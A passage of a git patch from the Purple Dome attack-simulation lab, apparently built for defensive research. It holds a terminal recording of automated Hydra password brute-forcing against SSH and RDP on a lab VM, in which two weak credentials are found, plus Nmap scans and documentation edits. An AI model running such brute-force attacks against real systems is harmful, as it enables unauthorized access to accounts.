account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwerty, continuing attacking the account.\r\n"] +[1144.199675, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: swordfish, continuing attacking the account.\r\n"] +[1144.200299, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: password, continuing attacking the account.\r\n"] +[1144.200436, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: passw0rd, continuing attacking the account.\r\n"] +[1144.209136, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwert, continuing attacking the account.\r\n"] +[1144.20928, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwerty, continuing attacking the account.\r\n"] +[1144.209856, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwertz, continuing attacking the account.\r\n"] +[1144.210193, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: 12345, continuing attacking the account.\r\n"] +[1144.219171, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: swordfish, continuing attacking the account.\r\n"] +[1144.219851, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: passw0rd, continuing attacking the account.\r\n"] +[1144.220367, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: password, continuing attacking the account.\r\n"] +[1144.220713, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: test, continuing attacking the account.\r\n"] +[1144.229099, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwert, continuing attacking the account.\r\n"] +[1144.229789, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwertz, continuing attacking the account.\r\n"] +[1144.23002, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwerty, continuing attacking the account.\r\n"] +[1144.230646, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: 12345, continuing attacking the account.\r\n"] +[1144.239324, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: swordfish, continuing attacking the account.\r\n"] +[1144.239896, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: passw0rd, continuing attacking the account.\r\n"] +[1144.24068, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: password, continuing attacking the account.\r\n"] +[1144.241006, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: test, continuing attacking the account.\r\n"] +[1144.247662, "o", "1 of 1 target completed, 0 valid password found\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-09 02:56:08\r\n"] +[1144.255595, "o", "Command exited with status 0.\r\n=== stdout ===\r\nReading package lists...\r\nBuilding dependency tree...\r\nReading state information...\r\nhydra is already the newest version (9.1-1).\r\n0 upgraded, 0 newly installed, 0 to remove and 1389 not upgraded.\r\nHydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-09 02:55:59\r\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 40 login tries (l:5/p:8), ~3 tries per task\r\n[DATA] attacking ssh://192.168.178.145:22/\r\n[22][ssh] host: 192.168.178.145 login: test password: test\r\n[22][ssh] host: 192.168.178.145 login: password password: passw0rd\r\n1 of 1 target successfully completed, 2 valid passwords found\r\n[WARNING] Writing restore file because 1 final worker threads did not complete until end.\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) fi"] +[1144.255716, "o", "nished at 2021-06-09 02:56:07\r\nHydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-09 02:56:07\r\n[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.\r\n[DATA] max 4 tasks per 1 server, overall 4 tasks, 40 login tries (l:5/p:8), ~10 tries per task\r\n[DATA] attacking rdp://192.168.178.145:3389/\r\n1 of 1 target completed, 0 valid password found\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-09 02:56:08\r\n\r\n=== stderr ===\r\nzsh:cd:1: no such file or directory: None\r\n\r\nWARNING: apt does not have a stable CLI interface. Use with caution in scripts.\r\n\r\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\r\n[ERROR] 1 target did not resolve or could not be connected\r\n[ERROR] 0 t"] +[1144.255769, "o", "arget did not complete\r\n[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover\r\n[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not acti"] +[1144.255809, "o", "ve for remote desktop: login: test password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwerty"] +[1144.255849, "o", ", continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwertz, continuing attacking the account.\r\n[3389]"] +[1144.25588, "o", "[rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.17"] +[1144.255921, "o", "8.145 might be valid but account not active for remote desktop: login: password password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: swordfish, continuing attacking the account.\r\n[3389][r"] +[1144.255953, "o", "dp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwerty, continuing"] +[1144.255987, "o", " attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: test, continuing attacking the account.\r\n\r\nDebug: Stderr: zsh:cd:1: no such file or directory: None\r\n\r\nWARNING: apt does not have a stable CLI interface. Us"] +[1144.256016, "o", "e with caution in scripts.\r\n\r\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\r\n[ERROR] 1 target did not resolve or could not be connected\r\n[ERROR] 0 target did not complete\r\n[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover\r\n[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: password, continuing attacking the account.\r\n[3389][rdp] acc"] +[1144.256047, "o", "ount on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account "] +[1144.256075, "o", "not active for remote desktop: login: root password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root passwor"] +[1144.256105, "o", "d: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: swordfish, continuing attac"] +[1144.256136, "o", "king the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: 12345, co"] +[1144.256166, "o", "ntinuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwert, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: non"] +[1144.256191, "o", "existend_user_2 password: qwertz, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: qwerty, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: 12345, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: swordfish, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: passw0rd, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_2 password: password, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not"] +[1144.256222, "o", " active for remote desktop: login: nonexistend_user_2 password: test, continuing attacking the account.\r\n"] +[1149.257446, "o", "Attacking machine with PAW: target3 with attack: nmap\r\n"] +[1149.263047, "o", "zsh:cd:1: no such file or directory: None\r\n"] +[1149.290654, "o", "Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-09 02:56 EDT\r\n"] +[1149.386065, "o", "Nmap scan report for target3.fritz.box (192.168.178.145)\r\nHost is up (0.00015s latency).\r\nNot shown: 999 closed ports\r\nPORT STATE SERVICE\r\n22/tcp open ssh\r\n\r\n"] +[1149.38617, "o", "Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds\r\n"] +[1149.392608, "o", "Command exited with status 0.\r\n=== stdout ===\r\nStarting Nmap 7.91 ( https://nmap.org ) at 2021-06-09 02:56 EDT\r\nNmap scan report for target3.fritz.box (192.168.178.145)\r\nHost is up (0.00015s latency).\r\nNot shown: 999 closed ports\r\nPORT STATE SERVICE\r\n22/tcp open ssh\r\n\r\nNmap done: 1 IP address (1 host up) scanned in 0.12 seconds\r\n\r\n=== stderr ===\r\nzsh:cd:1: no such file or directory: None\r\n\r\nDebug: Stderr: zsh:cd:1: no such file or directory: None\r\n"] +[1154.397646, "o", "Attacking machine with PAW: target3 with attack: nmap_stresstest\r\n"] +[1154.404994, "o", "zsh:cd:1: no such file or directory: None\r\n"] +[1154.430451, "o", "Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-09 02:56 EDT\r\n"] +[1154.466996, "o", "Nmap scan report for target3.fritz.box (192.168.178.145)\r\nHost is up (0.00015s latency).\r\nNot shown: 999 closed ports\r\nPORT STATE SERVICE\r\n22/tcp open ssh\r\n\r\n"] +[1154.467118, "o", "Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds\r\n"] +[1154.474324, "o", "Command exited with status 0.\r\n=== stdout ===\r\nStarting Nmap 7.91 ( https://nmap.org ) at 2021-06-09 02:56 EDT\r\nNmap scan report for target3.fritz.box (192.168.178.145)\r\nHost is up (0.00015s latency).\r\nNot shown: 999 closed ports\r\nPORT STATE SERVICE\r\n22/tcp open ssh\r\n\r\nNmap done: 1 IP address (1 host up) scanned in 0.06 seconds\r\n\r\n=== stderr ===\r\nzsh:cd:1: no such file or directory: None\r\n\r\n"] +[1154.474419, "o", "Debug: Stderr: zsh:cd:1: no such file or directory: None\r\n"] +[1159.477456, "o", "\u001b[92mFinished Kali attacks\u001b[0m\r\n"] +[1159.69311, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[1169.750938, "o", "Could Not Find C:\\capture\\winidp_data.zip\r\r\n"] +[1169.765534, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nCould Not Find C:\\capture\\winidp_data.zip\r\n\r\nDebug: Stderr: Could Not Find C:\\capture\\winidp_data.zip\r\n"] +[1169.86244, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[1170.144087, "o", " 1 file(s) copied.\r\r\n"] +[1170.158542, "o", "Command exited with status 0.\r\n=== stdout ===\r\n 1 file(s) copied.\r\n\r\n(no stderr)\r\n"] +[1170.216215, "o", "sudo kill -SIGHUP $(pidof -s idpx); while [ ! -f /tmp/idpx.proto ]; do sleep 1; done ; rm ~/idpx\r\n"] +[1171.267669, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[1171.275309, "o", "\u001b[94m Uninstalling vulnerabilities on target2w \u001b[0m\r\n"] +[1171.339028, "o", "The command completed successfully.\r\r\n\r\r\n"] +[1171.356677, "o", "Command exited with status 0.\r\n=== stdout ===\r\nThe command completed successfully.\r\n\r\n(no stderr)\r\n"] +[1171.45084, "o", "The command completed successfully.\r\r\n\r\r\n"] +[1171.473186, "o", "Command exited with status 0.\r\n=== stdout ===\r\nThe command completed successfully.\r\n\r\n(no stderr)\r\n"] +[1171.543427, "o", "'\"NET LOCALGROUP \"Remote' is not recognized as an internal or external command,\r\r\noperable program or batch file.\r\r\n"] +[1171.803471, "o", "'\"NET LOCALGROUP \"Remote' is not recognized as an internal or external command,\r\r\noperable program or batch file.\r\r\n"] +[1172.047409, "o", "'\"NET LOCALGROUP \"Remote' is not recognized as an internal or external command,\r\r\noperable program or batch file.\r\r\n"] +[1172.31145, "o", "'\"NET LOCALGROUP \"Remote' is not recognized as an internal or external command,\r\r\noperable program or batch file.\r\r\n"] +[1172.570747, "o", "The operation completed successfully.\r\r\r\n"] +[1172.583944, "o", "Command exited with status 0.\r\n=== stdout ===\r\nThe operation completed successfully.\r\n\r\n(no stderr)\r\n"] +[1172.807534, "o", "\r\r\nUpdated 3 rule(s).\r\r\n"] +[1172.807667, "o", "Ok.\r\r\n"] +[1172.807739, "o", "\r\r\n"] +[1172.844854, "o", "Command exited with status 0.\r\n=== stdout ===\r\n\r\r\nUpdated 3 rule(s).\r\r\nOk.\r\n\r\n(no stderr)\r\n\u001b[92m Done uninstalling vulnerabilities on target2w \u001b[0m\r\n\u001b[94m Uninstalling vulnerabilities on target3 \u001b[0m\r\n"] +[1172.862366, "o", "userdel: test mail spool (/var/mail/test) not found\r\n"] +[1172.877426, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nuserdel: test mail spool (/var/mail/test) not found\r\n\r\nDebug: Stderr: userdel: test mail spool (/var/mail/test) not found\r\n"] +[1172.925985, "o", "userdel: password mail spool (/var/mail/password) not found\r\n"] +[1172.945432, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nuserdel: password mail spool (/var/mail/password) not found\r\n\r\nDebug: Stderr: userdel: password mail spool (/var/mail/password) not found\r\n"] +[1172.957449, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[1173.009901, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[1173.010037, "o", "\u001b[92m Done uninstalling vulnerabilities on target3 \u001b[0m\r\n\u001b[94mStopping machine: target2 \u001b[0m\r\n"] +[1176.20632, "o", "\u001b[92mMachine stopped: target2\u001b[0m\r\n\u001b[94mStopping machine: target3 \u001b[0m\r\n"] +[1181.648082, "o", "\u001b[92mMachine stopped: target3\u001b[0m\r\n\u001b[94mStopping machine: attacker \u001b[0m\r\n"] +[1186.901824, "o", "\u001b[92mMachine stopped: attacker\u001b[0m\r\n"] +[1186.90263, "o", "Creating zip file loot/2021_06_09___08_38_02/2021_06_09___08_38_02.zip\r\n"] +[1186.931928, "o", "\u001b]0;thorsten@avast: /home/PurpleDome\u0007\u001b[01;32mthorsten@avast\u001b[00m:\u001b[01;34m/home/PurpleDome\u001b[00m$ "] +[1233.852884, "o", "e"] +[1234.124846, "o", "x"] +[1234.380891, "o", "i"] +[1234.556928, "o", "t"] +[1235.261009, "o", "\r\n"] +[1235.261116, "o", "exit\r\n"] diff --git a/doc/source/basics/background.rst b/doc/source/basics/background.rst index 6d0cbef..c4410be 100644 --- a/doc/source/basics/background.rst +++ b/doc/source/basics/background.rst @@ -2,7 +2,7 @@ Basics ====== -Purple Dome is a simulated and automated environment to play with several operating system attacking each other. +Purple Dome is a simulated and automated environment to experiment with several operating system attacking each other. This tool generates an attacker VM and target VMs. Automated attacks are then run against the targets and they will log system events. Those logs will then be stored away for analysis. @@ -17,21 +17,21 @@ Features * VM controller abstracted as plugins * Local vagrant based (debug and development) * Cloud based -* Caldera attacks -* Kali attack tools as plugins -* Data collection: Attack log and sensor data +* Attacks as plugins controlling + * Caldera attacks + * Kali attacks + * Metasploit attacks +* Data collection: Attack log and sensor data in parallel with timestamps for matching events * Vulnerability plugins: Modify the targets before the attack Components ========== -You will interact with the command line tools. Those are described in the *CLI* chapter. +The command line tools are the way you will interact with Purple Dome the most. Those are described in the *CLI* chapter. -If you want to modify Purple Dome and contribute to it I can point you to the *Extending* chapter +The experiments are configured in YAML files, the format is described in the *configuration* chapter. You will also want to create some target VMs. You can do this manually or use Vagrant. Vagrant makes it simple to create Linux targets. Windows targets (with some start configuration) are harder and have an own chapter. -On of the first things you will want to do is configuring the whole thing. Basically you have to touch two things: The configuration file must be modified (in YAML format). And you will also want to create some target VMs. - -Vagrant makes it simple to create Linux targets. Windows targets (with some start configuration) are harder and have an own chapter. +If you want to modify Purple Dome and contribute to it I can point you to the *Extending* chapter. Thanks to a plugin interface this is quite simple. diff --git a/doc/source/basics/configuration.rst b/doc/source/basics/configuration.rst index cb6336c..e16887e 100644 --- a/doc/source/basics/configuration.rst +++ b/doc/source/basics/configuration.rst @@ -2,30 +2,20 @@ Configuration ============= -Configuration is contained in yaml files. The example shipped with the code is *experiment.yaml*. +Configuration is contained in yaml files. The example shipped with the code is *template.yaml*. -To define the VMs there are also *Vagrantfiles* and associated scripts. The example shipped with the code is in the *systems* folder. +To define the VMs there are also *Vagrantfiles* and associated scripts. The example shipped with the code is in the *systems* folder. Using Vagrant is optional. Machines ======== -Machines (targets and attacker) are configured in *experiment.yaml*. There are different kinds of VM controllers and different communication interfaces. You will have to pick one and configure it. -If you use the VM controller "vagrant" you will also have to create a Vagrantfile and link to it's folder. - - -Vagrant machines -~~~~~~~~~~~~~~~~ - -* vagrantfilepath: Path where the vagrantfile is stored - - -Communication interfaces ------------------------- +Machines (targets and attacker) are configured in *experiment.yaml* - the default config file. There are different kinds of VM controllers and different communication interfaces. You will have to pick one and configure it per machine. +If you use the VM controller "vagrant" you will also have to create a Vagrantfile and link to the folder containing it. SSH -~~~ +--- -SSH is the default communication interfaces. For Linux machines it can use vagrant to establish communications (get the keyfile). For Windows - which needs OpenSSH installed - the configuration needs the proper keyfile specified. +SSH is the default communication interfaces. If you use Linux and Vagrant Purple Dome can use vagrant to establish SSH communication. For Windows - which needs OpenSSH installed - the configuration needs the proper keyfile specified. Attacks @@ -34,32 +24,23 @@ Attacks caldera_attacks --------------- -Caldera attacks (called abilities) are identified by a unique ID. Some abilities are built to target several OS-es. But to be flexible with targeting the config has separate lists. +Caldera attacks (called abilities) are identified by a unique ID. Some abilities are built to target several OS-es. -All Caldera abilities are available. But Purple Dome is still missing support for parameters and return values. This can restrict the available abilities at the moment. +All Caldera abilities are available. As some will need parameters and Caldera does not offer the option to configure those in the YAML, some caldera attacks might not work without implementing a plugin. kali_attacks ------------ -Kali attacks are kali commandline tools run by a small piece of python code in Purple Dome. This is the reason why not all Kali functionality is available yet. +Kali attacks are kali commandline tools run. Those are executed by specific Purple Dome plugins. Only Kali tools dupported by a plugin are available. You can reference them by the plugin name. kali_conf --------- -All kali attacks can have a special configuration. The configuration is tool specific. +All kali attacks can have a special configuration. The configuration is attack tool specific. -Config file -=========== +Example config file +=================== .. autoyaml:: ../template.yaml -TBD -=== - -Some features are not implemented yet. They will be added to the config file later - -* Terraform -* Separate attack script -* Azure -* Plugin infrastructure (which will change the configuration of plugins, maybe even require splitting and moving configuration around) diff --git a/doc/source/basics/learned.rst b/doc/source/basics/learned.rst index 5847020..778bf46 100644 --- a/doc/source/basics/learned.rst +++ b/doc/source/basics/learned.rst @@ -7,16 +7,3 @@ Mistakes made/lessons learned * Caldera server needs golang installed: *sudo apt install golang-go* * WinRM ist NOT the way to go. Better use OpenSSH for Windows. - -Decisions ---------- - -* Plugins and other things that are relevant for University coop are published here: https://github.com/avast -* Purple Dome Core is internal -* Caldera bugs and similar can and should be fixed in the core project -* What has been named "Victim" so far is better named "Target" -* Running it with Windows VMs is essential. Also install AV - * It is possible that Vagrant + Windows has issues. In that case: Build Windows VMs and create Snapshots. This is why we need a better VM control lib. - * MSDN license is ordered - * We will control the attacks. So we can run this without VMCloak -* Avast seems to be moving those things to AWS. So be ready to move the project there as well. diff --git a/doc/source/basics/windows_targets.rst b/doc/source/basics/windows_targets.rst index c9c4410..26994d9 100644 --- a/doc/source/basics/windows_targets.rst +++ b/doc/source/basics/windows_targets.rst @@ -7,11 +7,10 @@ Windows Vagrant boxes need a special setup. They have to be created from a runni Windows Box ----------- -If you use Vagrant you need a vagrant box first. It is a base image the vm will be based on. +If you use Vagrant you need a vagrant box first. On this image the vm will be based on. -The base vm must be running in VirtualBox ! +The base vm must be running in VirtualBox when taking the snapshot. To do so, use:: -Bash:: vagrant package --base 'Windows 10 x64' @@ -26,8 +25,6 @@ After that it can be used under this name in a Vagrantfile. Setting up Windows for Purple Dome ---------------------------------- -* Mount the vagrant share to X: (at least my scripts expect it) *net use x:\\vboxsvr\share* -* Create a batch file in C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup to automatically start *caldera_agent.bat* in the vagrant share for this machine. This ensures that the caldera agent can be started in reboot * Install OpenSSH on the windows target (https://docs.microsoft.com/de-de/windows-server/administration/openssh/openssh_install_firstuse and https://docs.microsoft.com/de-de/windows-server/administration/openssh/openssh_keymanagement) Some SSH hints (powershell): @@ -74,12 +71,12 @@ To connect from linux call bash:: (Capital letters for user name !) * The parameters enforce the use of a specific key. You can also drop that into the ssh config -Footnote: WinRM failed. I tried. The python code does not support ssh-style "disown". Vagrant files needed a special configuration-and sometimes failed connecting to the windows host properly. Base problem was that it does not properly support empty passwords (not on python, anyway) - and I used them for auto-login. Because some windows versions are a bit tricky with auto-login settings as they should be. Windows 10 is mutating here like hell. +Footnote: WinRM failed. SCP from and to Windows ----------------------- -Just use the user's home folder as entry and do:: +Just use the user's home folder as "entry folder" and do:: scp win10:my_logs.zip . diff --git a/doc/source/extending/attack_plugins.rst b/doc/source/extending/attack_plugins.rst index 6478792..4a4d90c 100644 --- a/doc/source/extending/attack_plugins.rst +++ b/doc/source/extending/attack_plugins.rst @@ -9,9 +9,9 @@ An example plugin is in the file *hydra_plugin.py*. It contains a plugin class t :: - Important: We want to improve defense in this project. Adding any attack must be done with this goal. To guarantee that: + Important: This projects goal is to improve defense. Adding any attack must be done with this goal. To guarantee that: - * Only add attacks that are already ITW + * Only add attacks that are already in the wild * Link to blog posts describing this attack * Maybe already drop some ideas how to 